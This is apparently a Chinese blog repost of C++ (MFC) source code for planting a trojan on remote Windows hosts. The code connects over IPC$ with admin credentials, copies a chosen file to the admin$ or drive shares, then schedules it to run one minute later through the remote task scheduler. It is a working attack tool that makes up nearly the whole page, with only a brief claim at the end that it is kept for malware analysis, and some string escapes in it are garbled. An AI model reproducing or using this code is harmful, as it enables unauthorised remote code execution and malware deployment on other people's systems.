远程IPC种植木马

来源:互联网 发布:科幻美剧推荐知乎 编辑:程序博客网 时间:2024/03/28 22:14

要实现代码如下:

///////////////////////////////////////////////////////////////////////////////////// typedef struct TagHost { CString host; CString user; CString pass; CString filename; CString LocalFilePath; CListBox* list; }IPC;void CShareDlg::OnStart() //启动线程序 {   UpdateData(TRUE);   IPC* ipc = new IPC;   ipc->host = m_host;   ipc->user = m_user;   ipc->pass = m_pass;   ipc->LocalFilePath = m_localfile;   ipc->filename = filename;   ipc->list = &m_list;   AfxBeginThread(ThreadIpcConnect,ipc); }/////////////////////////////线程/////////////////////////////////////////////////////UINT ThreadIpcConnect(LPVOID lpvoid) {   IPC* ipc;   CListBox* list;  ipc = (IPC*)lpvoid;   CString host;   CString admin;   CString pass;   CString filename;   CString localfilepath;  host = ipc->host ;   pass = ipc->pass;   admin = ipc->user;   localfilepath = ipc->LocalFilePath;   filename =ipc->filename ; list = ipc->list;   BOOL IpcConnect;  LPTIME_OF_DAY_INFO TimeBuf=NULL;   NET_API_STATUS Status;  CString RemoteFilePath,CmdCom("admin$\"); ///////////////////////////////IPC连接////////////////////////////////////////////////////////////////   NETRESOURCE ns;   TCHAR buf[MAX_PATH];   wsprintf(buf,"\\%s\ipc$",host);   ZeroMemory(&ns,sizeof(ns));   ns.dwScope=RESOURCE_GLOBALNET;   ns.dwType=RESOURCETYPE_ANY;   ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;   ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;   ns.lpLocalName="";   ns.lpRemoteName=buf;   ns.lpProvider=NULL;   ns.lpComment=NULL;   CString hhost = host;   IpcConnect =WNetAddConnection2(&ns,pass,admin,0); ///建立IPC连接   if(IpcConnect)   { //连接成功后 ///////////////////////////连接成功上传文件//////////////////////////////////////////////////////////     RemoteFilePath=("\\"+host+"\admin$\"+filename);     IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE); //复制文件到admin$(winnt) 如果复制失败,,向其他共享区复制       if(!IpcConnect)         {           RemoteFilePath=("\\"+host+"\C$\"+filename);           CmdCom="C:\"+filename;           IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);             if(!IpcConnect)             {                RemoteFilePath=("\\"+host+"\D$\"+filename);                CmdCom="D:\"+filename;                IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);            if(!IpcConnect)                   {                      RemoteFilePath=("\\"+host+"\E$\"+filename);                      CmdCom="E:\"+filename;                      IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);                      if(!IpcConnect)                        {                         RemoteFilePath ("\\"+host+"\F$\"+filename);                         CmdCom = "F:\"+filename;                      IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);                        }                   }               }          } ///////////////////////////得到远程主机时间///////////////////////////////////////////////////////////          if(IpcConnect)          {//获取远程主机时间            Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);             if(Status==NERR_Success)             {//活取时间成功 ///////////////////////////启动目标文件///////////////////////////////////////////////////////////////               DWORD day=1,JobTime;               AT_INFO ai;               day=day*2;               ai.Command=CmdCom.AllocSysString();               ai.DaysOfMonth=day;               ai.DaysOfWeek=0;               ai.Flags=JOB_NONINTERACTIVE;               ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000;               Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);               //启动上传的文件,一分钟后启动               if(Status==NERR_Success)               {                 list->AddString(host+"启动成功");               }               else                 list->AddString(host+"启动失败");               }           else             {              list->AddString(host+"获取时间失败");             }          }          else          {           list->AddString(host+"复制文件失败");          }     }     else     list->AddString(host+"连接失败"); return TRUE; } 


代码来自于互联网并且这些代码仅仅是为了备份,供分析木马病毒的时候使用

0 0